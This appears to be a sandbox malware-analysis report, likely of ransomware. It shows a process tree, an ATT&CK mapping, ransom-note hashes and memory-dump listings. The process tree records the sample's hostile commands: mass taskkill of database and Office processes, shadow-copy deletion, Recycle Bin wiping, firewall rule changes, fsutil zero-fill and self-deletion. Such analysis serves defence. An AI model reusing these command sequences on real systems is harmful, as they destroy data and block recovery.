C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1292

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3232

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2136

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1676

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3460

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1176

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1104

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM visio.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2832

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2040

C:\Windows\SysWOW64\arp.exe
"arp" -a
2⤵
PID:1912

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3740

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM winword.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1080

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3200

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
2⤵
- Kills process with taskkill
PID:1536

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:996

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ragent.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2496

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM rmngr.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:960

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM rphost.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2676

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM 1cv8.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1788

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sql.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3716

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqld.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2396

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysql.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3976

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3980

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM oracle.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2908

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM vmwp.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3052

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3632

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
2⤵
PID:820

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
PID:1056

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
2⤵
PID:1420

C:\Windows\SysWOW64\arp.exe
"arp" -a
2⤵
PID:4008

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\Инструкция.txt
2⤵
PID:2624

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
2⤵
PID:3956

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.7 -n 3
3⤵
- Runs ping.exe
PID:68

C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
3⤵
PID:820

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\iE8JUAJp7.bin.exe
2⤵
PID:984

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
1⤵
PID:2332

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Winlogon Helper DLL

1

T1004

Privilege Escalation

Defense Evasion

Modify Registry

3

T1112

Credential Access

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

2

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Desktop\Инструкция.txt
MD5
379fb0b88669df8cd1998c5b91f10198

SHA1
ffda31af7a9d1e6d70d51338467d008d5bba974e

SHA256
9832d637e28f6590354185a605ac5a8289c2d6824ba1122944091c52e8bbf1b4

SHA512
1689ca5b369e941889df2a392dbbb1a4c4fbcc91622493ad9c96e5988e843d2f0cbaca0cacf4ead63e2a33bcb00d4cb8e5f42f3b2df952ba7e9faa5d37e01752

Download Submit
memory/60-131-0x0000000000000000-mapping.dmp

Download
memory/348-160-0x0000000000000000-mapping.dmp

Download
memory/380-123-0x0000000000000000-mapping.dmp

Download
memory/816-120-0x0000000000000000-mapping.dmp

Download
memory/836-130-0x0000000000000000-mapping.dmp

Download
memory/840-165-0x0000000000000000-mapping.dmp

Download
memory/900-147-0x0000000000000000-mapping.dmp

Download
memory/960-182-0x0000000000000000-mapping.dmp

Download
memory/984-157-0x0000000000000000-mapping.dmp

Download
memory/988-158-0x0000000000000000-mapping.dmp

Download
memory/996-180-0x0000000000000000-mapping.dmp

Download
memory/1020-164-0x0000000000000000-mapping.dmp

Download
memory/1056-159-0x0000000000000000-mapping.dmp

Download
memory/1068-162-0x0000000000000000-mapping.dmp

Download
memory/1080-177-0x0000000000000000-mapping.dmp

Download
memory/1104-171-0x0000000000000000-mapping.dmp

Download
memory/1104-118-0x0000000000000000-mapping.dmp

Download
memory/1152-127-0x0000000000000000-mapping.dmp

Download
memory/1176-170-0x0000000000000000-mapping.dmp

Download
memory/1264-161-0x0000000000000000-mapping.dmp

Download
memory/1292-166-0x0000000000000000-mapping.dmp

Download
memory/1368-133-0x0000000000000000-mapping.dmp

Download
memory/1424-124-0x0000000000000000-mapping.dmp

Download
memory/1448-145-0x0000000000000000-mapping.dmp

Download
memory/1516-156-0x0000000000000000-mapping.dmp

Download
memory/1536-179-0x0000000000000000-mapping.dmp

Download
memory/1544-129-0x0000000000000000-mapping.dmp

Download
memory/1620-172-0x0000000000000000-mapping.dmp

Download
memory/1676-142-0x0000000000000000-mapping.dmp

Download
memory/1676-168-0x0000000000000000-mapping.dmp

Download
memory/1696-154-0x0000000000000000-mapping.dmp

Download
memory/1792-126-0x0000000000000000-mapping.dmp

Download
memory/1828-132-0x0000000000000000-mapping.dmp

Download
memory/1896-163-0x0000000000000000-mapping.dmp

Download
memory/1908-148-0x0000000000000000-mapping.dmp

Download
memory/1912-175-0x0000000000000000-mapping.dmp

Download
memory/2040-174-0x0000000000000000-mapping.dmp

Download
memory/2108-141-0x0000000000000000-mapping.dmp

Download
memory/2136-139-0x0000000000000000-mapping.dmp

Download
memory/2288-135-0x0000000000000000-mapping.dmp

Download
memory/2332-152-0x0000000000000000-mapping.dmp

Download
memory/2496-181-0x0000000000000000-mapping.dmp

Download
memory/2512-153-0x0000000000000000-mapping.dmp

Download
memory/2532-151-0x0000000000000000-mapping.dmp

Download
memory/2544-136-0x0000000000000000-mapping.dmp

Download
memory/2832-173-0x0000000000000000-mapping.dmp

Download
memory/2888-143-0x0000000000000000-mapping.dmp

Download
memory/2912-125-0x0000000000000000-mapping.dmp

Download
memory/2924-128-0x0000000000000000-mapping.dmp

Download
memory/3012-144-0x0000000000000000-mapping.dmp

Download
memory/3124-155-0x0000000000000000-mapping.dmp

Download
memory/3164-149-0x0000000000000000-mapping.dmp

Download
memory/3200-178-0x0000000000000000-mapping.dmp

Download
memory/3232-167-0x0000000000000000-mapping.dmp

Download
memory/3232-138-0x0000000000000000-mapping.dmp

Download
memory/3460-169-0x0000000000000000-mapping.dmp

Download
memory/3492-137-0x0000000000000000-mapping.dmp

Download
memory/3608-140-0x0000000000000000-mapping.dmp

Download
memory/3632-185-0x0000000004FA0000-0x0000000004FA1000-memory.dmp

Filesize
4KB

Download
memory/3632-195-0x0000000008A90000-0x0000000008A91000-memory.dmp

Filesize
4KB

Download
memory/3632-208-0x0000000004F94000-0x0000000004F96000-memory.dmp

Filesize
8KB

Download
memory/3632-207-0x0000000004F93000-0x0000000004F94000-memory.dmp

Filesize
4KB

Download
memory/3632-206-0x0000000003690000-0x0000000003691000-memory.dmp

Filesize
4KB

Download
memory/3632-196-0x0000000003690000-0x0000000003691000-memory.dmp

Filesize
4KB

Download
memory/3632-194-0x0000000008C10000-0x0000000008C11000-memory.dmp

Filesize
4KB

Download
memory/3632-193-0x0000000008690000-0x0000000008691000-memory.dmp

Filesize
4KB

Download
memory/3632-184-0x0000000003690000-0x0000000003691000-memory.dmp

Filesize
4KB

Download
memory/3632-183-0x0000000003690000-0x0000000003691000-memory.dmp

Filesize
4KB

Download
memory/3632-191-0x0000000004F90000-0x0000000004F91000-memory.dmp

Filesize
4KB

Download
memory/3632-186-0x0000000007A50000-0x0000000007A51000-memory.dmp

Filesize
4KB

Download
memory/3632-187-0x00000000078F0000-0x00000000078F1000-memory.dmp

Filesize
4KB

Download
memory/3632-188-0x00000000079A0000-0x00000000079A1000-memory.dmp

Filesize
4KB

Download
memory/3632-190-0x00000000080F0000-0x00000000080F1000-memory.dmp

Filesize
4KB

Download
memory/3632-192-0x0000000004F92000-0x0000000004F93000-memory.dmp

Filesize
4KB

Download
memory/3716-122-0x0000000000000000-mapping.dmp

Download
memory/3740-176-0x0000000000000000-mapping.dmp

Download
memory/3832-121-0x0000000000000000-mapping.dmp

Download
memory/3940-119-0x0000000005140000-0x0000000005141000-memory.dmp

Filesize
4KB

Download
memory/3940-115-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download
memory/3940-209-0x0000000009D80000-0x0000000009D81000-memory.dmp

Filesize
4KB

Download
memory/3940-210-0x0000000007600000-0x0000000007601000-memory.dmp

Filesize
4KB

Download
memory/3940-117-0x0000000004A70000-0x0000000004A71000-memory.dmp

Filesize
4KB

Download
memory/3944-146-0x0000000000000000-mapping.dmp

Download
memory/4008-150-0x0000000000000000-mapping.dmp

Download
memory/4068-134-0x0000000000000000-mapping.dmp

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads